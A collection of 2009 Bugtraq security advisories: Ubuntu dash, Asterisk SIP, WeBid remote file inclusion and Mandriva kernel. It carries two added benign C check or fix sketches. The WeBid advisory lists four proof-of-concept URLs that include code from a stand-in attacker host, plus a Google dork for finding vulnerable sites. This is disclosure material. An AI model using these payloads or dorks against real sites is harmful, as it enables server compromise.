===========================================================
Ubuntu Security Notice USN-732-1             March 10, 2009
dash vulnerability
CVE-2009-0854
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  dash                            0.5.4-8ubuntu1.1

Ubuntu 8.10:
  dash                            0.5.4-9ubuntu1.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Wolfgang M. Reimer discovered that dash, when invoked as a login shell, would
source .profile files from the current directory. Local users may be able to
bypass security restrictions and gain root privileges by placing specially
crafted .profile files where they might get sourced by other dash users.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.diff.gz
      Size/MD5:   171656 5f74e0a922546193a9e6279ad8680c76
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.dsc
      Size/MD5:      697 e78236937fea17c0c7a43427321b1ce6
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
      Size/MD5:   212145 bc457e490a589d2f87f2333616b67931

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-8ubuntu1.1_all.deb
      Size/MD5:    22068 82557822348627c1b240069e431886e2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_amd64.deb
      Size/MD5:    96918 b8d43124e5353042c7fd93fcc5c19cc9

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_i386.deb
      Size/MD5:    87952 6bc4578aea92450f8e00625fd7a7755a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_lpia.deb
      Size/MD5:    88194 a90de1a5dedb9cbaeb65537e8e933356

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_powerpc.deb
      Size/MD5:    97400 5e2187820648d980b4edaa4e4a71b6c5

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_sparc.deb
      Size/MD5:    91072 dc5e22376445e185eacdaa049421c866

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.diff.gz
      Size/MD5:   129759 b5363e9ff9550e89dec4be8ddc408607
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.dsc
      Size/MD5:     1083 dc87a11f64c53960ffb1f55dc42a253f
    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
      Size/MD5:   212145 bc457e490a589d2f87f2333616b67931

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-9ubuntu1.1_all.deb
      Size/MD5:    22286 9a34d34a67d46b8fa42584a2a7d61f76

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_amd64.deb
      Size/MD5:    99406 8703819fce4bc25f65caa350de05763c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_i386.deb
      Size/MD5:    90266 9d8931f5ef08f4d649127db0ab644f8e

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_lpia.deb
      Size/MD5:    90322 a0db897e7a7c5a7706d71674bad025ee

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_powerpc.deb
      Size/MD5:    99500 a583f4a7fc59a7495cb3615c4af54b05

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_sparc.deb
      Size/MD5:    93030 1bd3a8c0907e56cb2ed17c572e61842b



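One way to check a host for the behaviour USN-732-1 describes, as an added example that is not part of the advisory: start the shell as a login shell with HOME and the working directory pointing at two different scratch directories, each holding a harmless .profile that only creates a marker file, then see which marker appears. The function name, result codes and the /tmp scratch location are assumptions of this sketch.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum profile_result {
    PROFILE_ERROR = -1,    /* scratch setup failed or the shell could not be run */
    PROFILE_HOME_ONLY = 0, /* only $HOME/.profile was sourced (corrected behaviour) */
    PROFILE_FROM_CWD = 1,  /* ./.profile was sourced (behaviour in the advisory) */
    PROFILE_NONE = 2       /* neither was sourced: result is inconclusive */
};

/* Create DIR/.profile whose only effect is to create the empty file MARKER. */
static int write_profile(const char *dir, const char *marker)
{
    char path[96];
    FILE *f;

    snprintf(path, sizeof path, "%s/.profile", dir);
    f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fprintf(f, ": > '%s'\n", marker);
    return fclose(f);
}

/* Run `SHELL -l -c :` with cwd != HOME and report which .profile it read. */
enum profile_result check_login_profile(const char *shell)
{
    char base[] = "/tmp/profile-check-XXXXXX"; /* assumed scratch location */
    char home[64], cwd[64], home_mark[64], cwd_mark[64], path[96];
    enum profile_result res = PROFILE_ERROR;
    int status = 0;
    pid_t pid;

    if (mkdtemp(base) == NULL)
        return PROFILE_ERROR;
    snprintf(home, sizeof home, "%s/home", base);
    snprintf(cwd, sizeof cwd, "%s/cwd", base);
    snprintf(home_mark, sizeof home_mark, "%s/home.sourced", base);
    snprintf(cwd_mark, sizeof cwd_mark, "%s/cwd.sourced", base);

    if (mkdir(home, 0700) == 0 && mkdir(cwd, 0700) == 0 &&
        write_profile(home, home_mark) == 0 &&
        write_profile(cwd, cwd_mark) == 0 && (pid = fork()) >= 0) {
        if (pid == 0) {
            /* Child: silence the shell, separate cwd from HOME, exec it. */
            int fd = open("/dev/null", O_RDWR);
            if (fd >= 0) {
                dup2(fd, 0);
                dup2(fd, 1);
                dup2(fd, 2);
            }
            if (chdir(cwd) != 0 || setenv("HOME", home, 1) != 0)
                _exit(127);
            execl(shell, shell, "-l", "-c", ":", (char *)NULL);
            _exit(127); /* exec failed */
        }
        if (waitpid(pid, &status, 0) == pid && WIFEXITED(status) &&
            WEXITSTATUS(status) != 127) {
            if (access(cwd_mark, F_OK) == 0)
                res = PROFILE_FROM_CWD;
            else if (access(home_mark, F_OK) == 0)
                res = PROFILE_HOME_ONLY; /* positive control fired */
            else
                res = PROFILE_NONE;
        }
    }

    /* Remove everything the check created. */
    unlink(home_mark);
    unlink(cwd_mark);
    snprintf(path, sizeof path, "%s/.profile", home);
    unlink(path);
    snprintf(path, sizeof path, "%s/.profile", cwd);
    unlink(path);
    rmdir(home);
    rmdir(cwd);
    rmdir(base);
    return res;
}

int main(int argc, char **argv)
{
    const char *shell = argc > 1 ? argv[1] : "/bin/dash";
    enum profile_result r = check_login_profile(shell);

    printf("%s: %s\n", shell,
           r == PROFILE_FROM_CWD  ? "sources .profile from the current directory" :
           r == PROFILE_HOME_ONLY ? "sources only $HOME/.profile" :
           r == PROFILE_NONE      ? "no .profile sourced (inconclusive)" :
                                    "could not run the check");
    return r == PROFILE_FROM_CWD;
}
```

The shell's system-wide /etc/profile also runs during the check, as it would at any login.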

To: bugtraq@securityfocus.com
From: "Asterisk Security Team" <security@asterisk.org>
Subject: AST-2009-002: Remote Crash Vulnerability in SIP channel driver
Message-Id: <E1Lh5uX-00022G-2b@mail.digium.com>
Date: Tue, 10 Mar 2009 12:38:37 -0500

               Asterisk Project Security Advisory - AST-2009-002

   +------------------------------------------------------------------------+
   |       Product       | Asterisk                                         |
   |---------------------+--------------------------------------------------|
   |       Summary       | Remote Crash Vulnerability in SIP channel driver |
   |---------------------+--------------------------------------------------|
   | Nature of Advisory  | Denial of Service                                |
   |---------------------+--------------------------------------------------|
   |   Susceptibility    | Remote Authenticated Sessions                    |
   |---------------------+--------------------------------------------------|
   |      Severity       | Moderate                                         |
   |---------------------+--------------------------------------------------|
   |   Exploits Known    | No                                               |
   |---------------------+--------------------------------------------------|
   |     Reported On     | February 6, 2009                                 |
   |---------------------+--------------------------------------------------|
   |     Reported By     | bugs.digium.com user klaus3000                   |
   |---------------------+--------------------------------------------------|
   |      Posted On      | March 10, 2009                                   |
   |---------------------+--------------------------------------------------|
   |   Last Updated On   | March 10, 2009                                   |
   |---------------------+--------------------------------------------------|
   |  Advisory Contact   | Joshua Colp <jcolp@digium.com>                   |
   |---------------------+--------------------------------------------------|
   |      CVE Name       |                                                  |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Description | When configured with pedantic=yes the SIP channel driver |
   |             | performs extra request URI checking on an INVITE         |
   |             | received as a result of a SIP spiral. As part of this    |
   |             | extra checking the headers from the outgoing SIP INVITE  |
   |             | sent and the received SIP INVITE are compared. The code  |
   |             | incorrectly assumes that the string for each header      |
   |             | passed in will be non-NULL in all cases. This is         |
   |             | incorrect because if no headers are present the value    |
   |             | passed in will be NULL.                                  |
   |             |                                                          |
   |             | The values passed into the code are now checked to be    |
   |             | non-NULL before being compared.                          |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Resolution | Upgrade to revision 174082 of the 1.4 branch, 174085 of   |
   |            | the 1.6.0 branch, 174086 of the 1.6.1 branch, or one of   |
   |            | the releases noted below.                                 |
   |            |                                                           |
   |            | The pedantic option in the SIP channel driver can also be |
   |            | turned off to prevent this issue from occurring.          |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                           Affected Versions                            |
   |------------------------------------------------------------------------|
   |          Product           | Release |                                 |
   |                            | Series  |                                 |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.2.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.4.x  | Versions 1.4.22, 1.4.23,        |
   |                            |         | 1.4.23.1                        |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.0.x | All versions prior to 1.6.0.6   |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.1.x | All versions prior to           |
   |                            |         | 1.6.1.0-rc2                     |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.2.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.4.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.6.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  A.x.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  B.x.x  | Not affected                    |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  C.x.x  | Only version C.2.3              |
   |----------------------------+---------+---------------------------------|
   | s800i (Asterisk Appliance) |  1.2.x  | Not affected                    |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                              Corrected In                              |
   |------------------------------------------------------------------------|
   |                  Product                  |          Release           |
   |-------------------------------------------+----------------------------|
   |           Asterisk Open Source            |          1.4.23.2          |
   |-------------------------------------------+----------------------------|
   |           Asterisk Open Source            |          1.6.0.6           |
   |-------------------------------------------+----------------------------|
   |           Asterisk Open Source            |        1.6.1.0-rc2         |
   |-------------------------------------------+----------------------------|
   |         Asterisk Business Edition         |          C.2.3.2           |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                                Patches                                 |
   |------------------------------------------------------------------------|
   |                               URL                               |Branch|
   |-----------------------------------------------------------------+------|
   |http://downloads.digium.com/pub/security/AST-2009-002-1.4.diff   |1.4   |
   |-----------------------------------------------------------------+------|
   |http://downloads.digium.com/pub/security/AST-2009-002-1.6.0.diff |1.6.0 |
   |-----------------------------------------------------------------+------|
   |http://downloads.digium.com/pub/security/AST-2009-002-1.6.1.diff |1.6.1 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |      Links       | http://bugs.digium.com/view.php?id417            |
   |                  |                                                     |
   |                  | http://bugs.digium.com/view.php?id547            |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Asterisk Project Security Advisories are posted at                     |
   | http://www.asterisk.org/security                                       |
   |                                                                        |
   | This document may be superseded by later versions; if so, the latest   |
   | version will be posted at                                              |
   | http://downloads.digium.com/pub/security/AST-2009-002.pdf and          |
   | http://downloads.digium.com/pub/security/AST-2009-002.html             |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                            Revision History                            |
   |------------------------------------------------------------------------|
   |       Date       |       Editor       |         Revisions Made         |
   |------------------+--------------------+--------------------------------|
   | 2009-03-10       | Joshua Colp        | Initial release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-002
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.
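The fix the advisory describes, checking for NULL before comparing, sketched as an added example that is not Asterisk's code: a stand-alone comparison of the header parts of two SIP URIs in which either side may be absent. The function names are hypothetical, and the matching rule (names case-insensitive, values byte-exact, order ignored, compared as sets) is an assumption made for the illustration.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Compare two "name=value" items: name case-insensitive, rest byte-exact. */
static bool item_equal(const char *x, size_t xl, const char *y, size_t yl)
{
    const char *eq;
    size_t name_len, i;

    if (xl != yl)
        return false;
    eq = memchr(x, '=', xl);
    name_len = eq ? (size_t)(eq - x) : xl;
    for (i = 0; i < name_len; i++)
        if (tolower((unsigned char)x[i]) != tolower((unsigned char)y[i]))
            return false;
    return memcmp(x + name_len, y + name_len, xl - name_len) == 0;
}

/* True if the item [item, item+len) occurs in the '&'-separated list. */
static bool has_item(const char *list, const char *item, size_t len)
{
    while (*list) {
        size_t l = strcspn(list, "&");
        if (item_equal(item, len, list, l))
            return true;
        list += l;
        if (*list == '&')
            list++;
    }
    return false;
}

/* True if every item of a also occurs in b. Both must be non-NULL. */
static bool subset(const char *a, const char *b)
{
    while (*a) {
        size_t l = strcspn(a, "&");
        if (!has_item(b, a, l))
            return false;
        a += l;
        if (*a == '&')
            a++;
    }
    return true;
}

/*
 * Compare the headers parts of two SIP URIs (the text after '?').
 * A URI without headers is represented by NULL, so NULL is handled
 * before any string function touches the pointers: passing NULL to
 * strlen/strcmp and friends is undefined behaviour and in practice a crash.
 */
bool uri_headers_match(const char *a, const char *b)
{
    bool a_empty = (a == NULL || *a == '\0');
    bool b_empty = (b == NULL || *b == '\0');

    if (a_empty || b_empty)
        return a_empty && b_empty;
    return subset(a, b) && subset(b, a);
}

int main(void)
{
    /* Constructed sample inputs. */
    printf("%d\n", uri_headers_match(NULL, NULL));
    printf("%d\n", uri_headers_match(NULL, "Subject=hi"));
    printf("%d\n", uri_headers_match("Subject=hi&Priority=urgent",
                                     "priority=urgent&subject=hi"));
    return 0;
}
```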

Date: Tue, 10 Mar 2009 12:10:49 -0600
Message-Id: <200903101810.n2AIAnHG006291@www5.securityfocus.com>
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File
 Inclusion Vulnerabilities

ECHO_ADV_104$2009

-----------------------------------------------------------------------------------------
[ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File Inclusion Vulnerabilities
-----------------------------------------------------------------------------------------

Author       : K-159
Date         : March, 11 th 2009
Location     : Jakarta, Indonesia
Web          : http://e-rdc.org/v1/news.php?readmore7
Critical Lvl : High
Impact       : System Access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WeBid
version     : <= 0.7.3 RC9
Vendor      : http://sourceforge.net/projects/simpleauction
              http://www.webidsupport.com/
Description :

WeBid is an open source PHP/MySQL fully featured auction script. Perfect for those who want to start their own auction site.

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "$include_path" parameter in the cron.php page is not properly verified before being used
to include files. This can be exploited to include arbitrary files from local or external resources.
This vulnerability also affects the files ST_browsers.php, ST_countries.php, and ST_platforms.php in the admin folder.
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~~~~~~~~~
http://www.example.com/[path]/cron.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_brwosers.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_countries.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_platforms.php?include_path=http://www.attacker.com/evil?

Dork:
~~~~~
Google : "copyright 2008, WEBID"


Solution:
~~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn off register_globals.

Timeline:
~~~~~~~~~

- 08 - 03 - 2009 bug found
- 08 - 03 - 2009 vendor contacted
- 08 - 03 - 2009 vendor response
- 11 - 03 - 2009 advisory release
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zizou - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage: http://www.e-rdc.org/

-------------------------------- [ EOF ] ---------------------------------- 

To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:071 ] kernel
Date: Tue, 10 Mar 2009 20:03:01 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1Lh7ED-0002rV-65@titan.mandriva.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:071
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kernel
 Date    : March 10, 2009
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 The skfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux
 kernel before 2.6.28.6 permits SKFP_CLR_STATS requests only when the
 CAP_NET_ADMIN capability is absent, instead of when this capability
 is present, which allows local users to reset the driver statistics,
 related to an inverted logic issue. (CVE-2009-0675)
 
 The sock_getsockopt function in net/core/sock.c in the Linux kernel
 before 2.6.28.6 does not initialize a certain structure member, which
 allows local users to obtain potentially sensitive information from
 kernel memory via an SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)
 
 Additionally, this update provides stable 1.0.18 ALSA updates/fixes,
 STAC92HD71Bx/STAC92HD75Bx hda-intel support changes/fixes
 (affects sound chip codecs used on several HP dv laptop series),
 fixes/enhancements for HP Educ.ar machine HDA sound support, minor
 alsa hda-intel code cleanup for ALC888 6stack-dell model, to stop
 printing unneeded output to kernel log, and a few more things. Check
 the package changelog for details.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2009.0:
 069e2b02020d1d066fd41fc0d786c5bb  2009.0/i586/lirc-kernel-server-latest-0.8.3-1.20090305.4.1mdv2009.0.i586.rpm
 bcdec52d839f3f301ca186cee7c5251a  2009.0/i586/lzma-kernel-2.6.27.19-desktop-1mnb-4.43-24mdv2009.0.i586.rpm
 624410092a36c6e8d5da31fa25f180de  2009.0/i586/lzma-kernel-2.6.27.19-desktop586-1mnb-4.43-24mdv2009.0.i586.rpm
 c0dcc69c679fd7e71585e1ad47e49296  2009.0/i586/lzma-kernel-2.6.27.19-server-1mnb-4.43-24mdv2009.0.i586.rpm
 24dccc6927984e3cc5226ea7ef0e4c6e  2009.0/i586/lzma-kernel-desktop586-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
 75e7e00da7b6d2de307dc7ba54b8496e  2009.0/i586/lzma-kernel-desktop-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
 833ab6a7e7d3698bf97e510ed2559151  2009.0/i586/lzma-kernel-server-latest-4.43-1.20090305.24mdv2009.0.i586.rpm
 a225f322f51b2c66553a3d20aa9b84d7  2009.0/i586/madwifi-kernel-2.6.27.19-desktop-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 8757bc3b6c02469827cd3fc4d4ee434a  2009.0/i586/madwifi-kernel-2.6.27.19-desktop586-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 c261089e440f598c75576db44c381bf3  2009.0/i586/madwifi-kernel-2.6.27.19-server-1mnb-0.9.4-3.r3835mdv2009.0.i586.rpm
 6774505946633000fdee6b46b284f966  2009.0/i586/madwifi-kernel-desktop586-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
 650b393616d0016978b79280504bb850  2009.0/i586/madwifi-kernel-desktop-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
 2647605d19cae74d65dcf871bea24a29  2009.0/i586/madwifi-kernel-server-latest-0.9.4-1.20090305.3.r3835mdv2009.0.i586.rpm
 164bff5c827a6c9035079de57c23ad95  2009.0/i586/nvidia173-kernel-2.6.27.19-desktop-1mnb-173.14.12-4mdv2009.0.i586.rpm
 6e0bdeebbe9dc2cb43ece0d417aa3717  2009.0/i586/nvidia173-kernel-2.6.27.19-desktop586-1mnb-173.14.12-4mdv2009.0.i586.rpm
 db8660249c42d373c74a4d184ae8503c  2009.0/i586/nvidia173-kernel-desktop586-latest-173.14.12-1.20090305.4mdv2009.0.i586.rpm
 6379084d1c176074cbb03d63da74a838  2009.0/i586/nvidia173-kernel-desktop-latest-173.14.12-1.20090305.4mdv2009.0.i586.rpm
 81cb1ae3ca9eb1936a83875fbadf2d8b  2009.0/i586/nvidia71xx-kernel-2.6.27.19-desktop-1mnb-71.86.06-5mdv2009.0.i586.rpm
 511b3bfac9f87e5a2d019b265eb0dbca  2009.0/i586/nvidia71xx-kernel-2.6.27.19-desktop586-1mnb-71.86.06-5mdv2009.0.i586.rpm
 d94d07e08ccd73ce799dcd4a552be793  2009.0/i586/nvidia71xx-kernel-2.6.27.19-server-1mnb-71.86.06-5mdv2009.0.i586.rpm
 1a7c007d81b7f519f879aa2e8d01e338  2009.0/i586/nvidia71xx-kernel-desktop586-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
 2af0764dc27da74ab0c371cb0ecdfd83  2009.0/i586/nvidia71xx-kernel-desktop-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
 9694789bcb36b812d47534e0711b1a45  2009.0/i586/nvidia71xx-kernel-server-latest-71.86.06-1.20090305.5mdv2009.0.i586.rpm
 cf03bc258ad23472f420173148558910  2009.0/i586/nvidia96xx-kernel-2.6.27.19-desktop-1mnb-96.43.07-5mdv2009.0.i586.rpm
 0b7d715d245cdf944676f6122af8ebd6  2009.0/i586/nvidia96xx-kernel-2.6.27.19-desktop586-1mnb-96.43.07-5mdv2009.0.i586.rpm
 b8196eff47518fe28a2e774f51b88532  2009.0/i586/nvidia96xx-kernel-2.6.27.19-server-1mnb-96.43.07-5mdv2009.0.i586.rpm
 949c8f30e7008988a867eedfb559b4fb  2009.0/i586/nvidia96xx-kernel-desktop586-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
 a646243e4b262a6f7fab9dc5fa915e89  2009.0/i586/nvidia96xx-kernel-desktop-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
 a05ffb2a8f5371bf6d30358aab05698c  2009.0/i586/nvidia96xx-kernel-server-latest-96.43.07-1.20090305.5mdv2009.0.i586.rpm
 8906ac0db00332a6700c38f8e8125cd0  2009.0/i586/nvidia-current-kernel-2.6.27.19-desktop-1mnb-177.70-2.3mdv2009.0.i586.rpm
 842c7f19ef358c788e58a72ffe23071b  2009.0/i586/nvidia-current-kernel-2.6.27.19-desktop586-1mnb-177.70-2.3mdv2009.0.i586.rpm
 4c27d98640d507934d58fa491575daa8  2009.0/i586/nvidia-current-kernel-2.6.27.19-server-1mnb-177.70-2.3mdv2009.0.i586.rpm
 2696288a3309bfae68cbb5b9ee9363e0  2009.0/i586/nvidia-current-kernel-desktop586-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
 3c1d28fb5632251983cacaec44578d86  2009.0/i586/nvidia-current-kernel-desktop-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
 6cf33c3312fd3256dcb14761921eb4ab  2009.0/i586/nvidia-current-kernel-server-latest-177.70-1.20090305.2.3mdv2009.0.i586.rpm
 eacb8ea778af3ff78ef58942eab23105  2009.0/i586/omfs-kernel-2.6.27.19-desktop-1mnb-0.8.0-1mdv2009.0.i586.rpm
 107264ee670882f9642532d05029e229  2009.0/i586/omfs-kernel-2.6.27.19-desktop586-1mnb-0.8.0-1mdv2009.0.i586.rpm
 b926add1895fbcda6ba32323f8e88718  2009.0/i586/omfs-kernel-2.6.27.19-server-1mnb-0.8.0-1mdv2009.0.i586.rpm
 9fbd459e57d8eeeafada18852830058a  2009.0/i586/omfs-kernel-desktop586-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
 325424f7a578647dfea9897dd4dccd40  2009.0/i586/omfs-kernel-desktop-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
 8da55e50cb708523e212ce2ede9182c4  2009.0/i586/omfs-kernel-server-latest-0.8.0-1.20090305.1mdv2009.0.i586.rpm
 7b60f82b26ca77ca995c19db818135cc  2009.0/i586/omnibook-kernel-2.6.27.19-desktop-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 5dead3be02cc6baf52f020b97c232a75  2009.0/i586/omnibook-kernel-2.6.27.19-desktop586-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 8c097aac6047b51e87889e579f9b891f  2009.0/i586/omnibook-kernel-2.6.27.19-server-1mnb-20080513-0.274.1mdv2009.0.i586.rpm
 48b63f06c6142efd0843d9477b60a033  2009.0/i586/omnibook-kernel-desktop586-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
 6529176b08f4dfd65fc94cc32367c54c  2009.0/i586/omnibook-kernel-desktop-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
 862f88d7d82bef088613231baf0bf113  2009.0/i586/omnibook-kernel-server-latest-20080513-1.20090305.0.274.1mdv2009.0.i586.rpm
 2b78f1db33766589890f955b3c3e8d90  2009.0/i586/opencbm-kernel-2.6.27.19-desktop-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 d6eb3627145b554742753487a699eb71  2009.0/i586/opencbm-kernel-2.6.27.19-desktop586-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 5fef6dba8d3e420e11ca46b89299eb96  2009.0/i586/opencbm-kernel-2.6.27.19-server-1mnb-0.4.2a-1mdv2008.1.i586.rpm
 eb2cf46481c7d3c5c506dd48f73d13a3  2009.0/i586/opencbm-kernel-desktop586-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
 802accbcaf5dbfa054624a825462f4c3  2009.0/i586/opencbm-kernel-desktop-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
 e8511deddd2814268b87b11e569cb1af  2009.0/i586/opencbm-kernel-server-latest-0.4.2a-1.20090305.1mdv2008.1.i586.rpm
 9f2b095f9ea7fba33c9a92449eceae81  2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop-1mnb-1.5.9-2mdv2009.0.i586.rpm
 f1ddfb49495fd5829ecf762a4592ee06  2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-desktop586-1mnb-1.5.9-2mdv2009.0.i586.rpm
 c31a76dc6c4720037d7f0a92e1e157aa  2009.0/i586/ov51x-jpeg-kernel-2.6.27.19-server-1mnb-1.5.9-2mdv2009.0.i586.rpm
 f24ee14c676a1cd20eea56db6ff9cea7  2009.0/i586/ov51x-jpeg-kernel-desktop586-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
 10f4aa4428b68e71a8bd4d5555f78454  2009.0/i586/ov51x-jpeg-kernel-desktop-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
 f6c26ba890714e3a9ded62420e130c5a  2009.0/i586/ov51x-jpeg-kernel-server-latest-1.5.9-1.20090305.2mdv2009.0.i586.rpm
 0f67c9befc9efd569cbdd2ccbfd85d93  2009.0/i586/qc-usb-kernel-2.6.27.19-desktop-1mnb-0.6.6-6mdv2009.0.i586.rpm
